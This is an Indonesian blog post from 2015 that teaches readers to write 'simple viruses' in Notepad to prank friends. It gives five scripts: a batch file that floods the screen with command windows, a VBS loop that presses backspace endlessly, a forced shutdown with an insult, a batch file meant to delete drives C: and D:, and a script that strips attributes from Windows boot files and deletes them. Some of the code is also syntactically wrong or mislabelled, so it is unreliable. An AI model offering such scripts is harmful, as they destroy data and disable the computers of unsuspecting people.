Rabu, 11 November 2015

Cara Membuat Virus Sederhana

          Nah pada postingan kali ini saya akan membagikan cara membuat virus sederhana. Virus ini bisa dipakai untuk mengerjai teman anda dan bisa cukup berbahaya. Berawal dari pengalaman saya yang tiba-tiba laptop yang saya miliki terkena virus dari flashdisk yang sebelumnya saya colok ke rental buat mengeprint tugas lalu saya colok ke laptop saya dan tiba-tiba isi file di dalam flashdisk saya berubah jadi shortcut semuanya, dan seketika virus tersebut langsung dengan cepat menyebar ke laptop saya sampai akhirnya laptop jadi lambat, jadi mau tidak mau ya harus install ulang Dari situlah saya mulai penasaran bagaimana caranya untuk membuat sebuah virus yang bisa meruak sebuah sistem. Langsung saja untuk membuatnya disini kita akan menggunakan Notepad yang diisi dengan script.

1. Saya akan menerangkan bagaimana cara membuat virus dengan Notepad. Buka Notepad melalui Start - all program - accessories - notepad kemudian setelah terbuka isi dengan kode script berikut :

start

start

start

start

start

start

start

start

start

start

start

start
Setelah itu simpan dengan nama terserah anda dengan exstensi .bat
contoh : "virus.bat" tanpa tanda kutip lalu ganti Save As Type menjadi All Files.
trik ini akan membuat komputer eror karena jika file "virus.bat" itu di buka akan membuka CMD yang banyak sehingga mengakibatkan komputer menjadi eror.
2.  Cara yang selanjutnya, cara membuat tombol backspace menjadi eror menekan terus menerus secara otomatis. Langsung saja isi notepad dengan code script dibawah :


MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
 selanjutnya simpan dengan nama terserah anda dengan exstensi .vbs
Contoh : "virus.vbs" tanpa tanda kutip jangan lupa Save As Type diganti menjadi All Files.
cara ini jika virus.vbs di buka akan membuat tombol backspace menjadi eror dan menekan dengan sendirinya.

3. Selanjutnya saya akan menerangkan cara agar komputer menjadi shutdown dengan sendirinya, langsung saja isi notepad dengan kode script dibawah :

@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
setelah itu simpan dengan nama terserah anda dengan exstensi .vbs
jika file ini di buka akan mengakibatkan komputer shutdown atau mati dengan sendiri.
4. Cara yang selanjutnya ini cukup berbahaya karena dapat menghapus seluruh data di hardisk tanpa terkecuali, jadi mau tidakmau harus di install ulang. Langsung saja isi notepad dengan script di bawah :
@echo off
DEL C: -Y
DEL D: -Y

 
kemudian  simpan dengan nama terserah anda dengan exstensi .bat dan Save As Type diganti menjadi All Files. Jika sudah jadi hati-hati jangan sampai file ini terbuka jika terbuka maka akan berakibat fatal seluruh data di hardisk anda akan hilang dan anda harus intall ulang.

5. Selanjutnya untuk yang terakhir yang tidka kalah ganasnya yang berakibat bisa merusak seluruh sistem di direktori C langsung saja isi notepad dengan script dibawa : 
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini 
kemudian simpan dengan nama terserah anda dengan exstensi .bat dan jangan lupa ganti jenis file menjadi All Files. Jika file ini di buka maka akan mengakibatkan autoexe.bat,
Boot.ini, ntldr, file win.ini yang terdapat di direktori C: terhapus.

Tidak ada komentar:

Posting Komentar